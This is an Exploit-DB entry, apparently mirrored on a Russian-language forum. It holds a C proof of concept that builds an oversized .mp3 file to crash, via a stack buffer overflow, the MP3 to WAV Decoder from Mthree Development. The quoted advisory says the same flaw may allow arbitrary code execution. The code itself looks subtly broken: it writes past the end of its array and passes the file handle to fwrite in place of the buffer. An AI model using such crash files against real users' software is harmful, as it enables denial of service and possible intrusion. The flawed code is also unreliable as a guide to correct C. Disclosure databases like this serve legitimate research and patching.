- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34368
- Проверка EDB
-
- Пройдено
- Автор
- 4M!N
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2009-10-31
Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow
C:
// source: https://www.securityfocus.com/bid/41912/info
MP3 to WAV Decoder is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.
/*
MP3 to WAV Decoder Local Crash PoC !
Discovered By ZAC003(4m!n)
Dl Link : http://www.mthreedev.com/setupmp3towav.exe
Greet Ciph3r for Help me !
*/
#include <stdio.h>
#include <windows.h>
#include <string.h>
#define overflow 13240
#define mp3 "zac003.mp3"
int main (int argc,char **argv){
char buffer[overflow];
FILE *Player;
printf("\n******************************************");
printf("\n* This Bug Discovered By ZAC003(4m!n) *");
printf("\n* Special Thank To Aria-Security.CoM *");
printf("\n* Greet Ciph3r for help me ! *");
printf("\n******************************************");
buffer[overflow] = 0;
Player = fopen(mp3,"w+");
fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
fclose(Player);
printf("\n Successfully !!");
return 0;
}- Источник
- www.exploit-db.com
